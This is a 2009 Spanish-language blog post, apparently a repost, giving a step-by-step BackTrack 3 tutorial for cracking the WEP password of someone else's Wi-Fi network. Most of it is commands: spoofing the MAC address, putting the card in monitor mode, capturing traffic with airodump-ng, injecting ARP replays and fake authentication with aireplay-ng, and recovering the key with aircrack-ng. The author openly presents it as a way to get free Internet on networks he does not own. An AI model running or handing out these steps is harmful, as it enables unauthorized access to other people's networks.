jueves, 12 de noviembre de 2009

Tutorial BackTrack 3



El hackeo o robo de contraseñas de redes inalámbricas o Wi-Fi es muy común hoy en día, en muchos casos el acceso es realmente fácil, en otros mas complejos, yo mismo lo he realizado en algunas ocasiones para obtener Internet cuando realizo viajes con la notebook, en esta ocasión les voy a explicar un pequeño tutorial sobre Backtrack 3 y como obtener contraseñas de una red Wi-Fi con encriptación WEP.


Pasos a seguir:

- En primer lugar deberemos descargar Backtrack 3 —-> Enlace de descarga (695 MB).
- Grabamos el software en un CD, reiniciamos la PC y colocamos el CD para que arranque Backtrack 3.
- Debemos abrir la consola (Shell), si conoces Linux estarás familiarizado con el termino.
- Tenemos que desactivar la tarjeta de red con el comando airmon-ng stop ath0, donde ath0 es el nombre de la placa, en este caso es altheros.



- Hay que cambiar la MAC, para ello escribimos: macchanger -m 11:22:33:44:55:66 wifi0.



- Arrancamos nuestra placa de red en modo monitor y escribimos: airmon-ng start wifi0.



- Escribimos: iwconfig para comprobar que todo lo que hicimos esta realizado correctamente.



- Revisamos si hay redes en nuestra área de cobertura, para ello escribimos: airodump-ng wifi0.



- Ahora lo importante de la imagen anterior es la MAC de la red (BSSID), el canal por donde se transmite la red Wi-Fi (CH), y el nombre de la red (ESSID).
Para detener la búsqueda de redes presionamos CTRL + C y escribimos los siguiente: airodump-ng –channel X –write XXX ath0. La “X” en channel se reemplaza por 5 en este caso y la “XXX”es el nombre con que guardamos la información, puede colocarse cualquier nombre.
- Abrimos otra ventana de Shell y escribimos: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0.



- Nuevamente abrimos otra ventana de shell y escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0.



- Bueno finalmente deberemos ser pacientes y esperar que los ARP sean altos (50.000), para así poder obtener la contraseña. Cuando tengamos suficiente datos para poder descifrar la password (lleva tiempo y experiencia), cerramos todos los Shell y escribimos: Aircrack-ng pass-01.cap, con esto descifraremos la contraseña encriptada.






http://www.solotecnologia.net/2009/10/tutorial-backtrack-3/
Publicado por Fernando Diego en 15:57

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)